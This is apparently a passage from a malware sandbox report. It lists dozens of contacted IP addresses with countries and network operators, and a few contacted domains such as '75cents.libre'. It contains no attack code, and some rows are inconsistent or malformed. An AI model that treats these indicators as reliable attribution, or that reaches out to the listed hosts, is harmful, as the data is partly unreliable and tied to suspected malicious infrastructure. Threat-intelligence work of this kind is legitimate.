 unknown Italy
31115 INTRED-ASIT false
144.130.103.114
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
13.185.13.174
 unknown United States
7018 ATT-INTERNET4US false
136.207.25.93
 unknown United States
531 DNIC-AS-00531US false
189.91.180.91
 unknown Brazil
28207 TeleonTelecomunicacoesLtdaBR false
210.182.196.72
 unknown Korea Republic of
3786 LGDACOMLGDACOMCorporationKR false
66.101.41.211
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
29.226.156.129
 unknown United States
7922 COMCAST-7922US false
132.62.99.148
 unknown United States
385 AFCONC-BLOCK1-ASUS false
123.231.123.144
 unknown Sri Lanka
18001 DIALOG-ASDialogAxiataPLCLK false
20.77.138.98
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
148.254.35.226
 unknown United States
174 COGENT-174US false
139.137.223.159
 unknown United States
22093 CCF-NETWORKUS false
45.236.206.135
 unknown Brazil
268245 AMIGALINKCOMUNICACOESLTDA-MEBR false
112.83.198.191
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
120.205.130.218
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
172.219.70.46
 unknown Canada
852 ASN852CA false
89.35.17.43
 unknown Belgium
49405 MOTTO-VOIP-ASNL false
51.19.35.220
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
174.169.173.53
 unknown United States
7922 COMCAST-7922US false
208.133.37.247
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
59.200.26.7
 unknown China
2516 KDDIKDDICORPORATIONJP false
134.39.230.71
 unknown United States
10430 WA-K20US false
126.116.165.57
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
2.170.90.35
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
168.149.171.19
 unknown United States
396982 GOOGLE-PRIVATE-CLOUDUS false
164.130.42.172
 unknown Italy
51964 ORANGE-BUSINESS-SERVICES-IPSN-ASNFR false
43.57.21.4
 unknown Japan 4249 LILLY-ASUS false
157.91.104.16
 unknown United States
1767 ILIGHT-NETUS false
90.189.222.54
 unknown Russian Federation
12389 ROSTELECOM-ASRU false
168.192.19.56
 unknown United States
27435 OPSOURCE-INCUS false

Contacted Domains

Name IP Active
75cents.libre 156.244.13.91 true
daisy.ubuntu.com 162.213.35.24 true
fortyfivehundred.dyn. [malformed] unknown unknown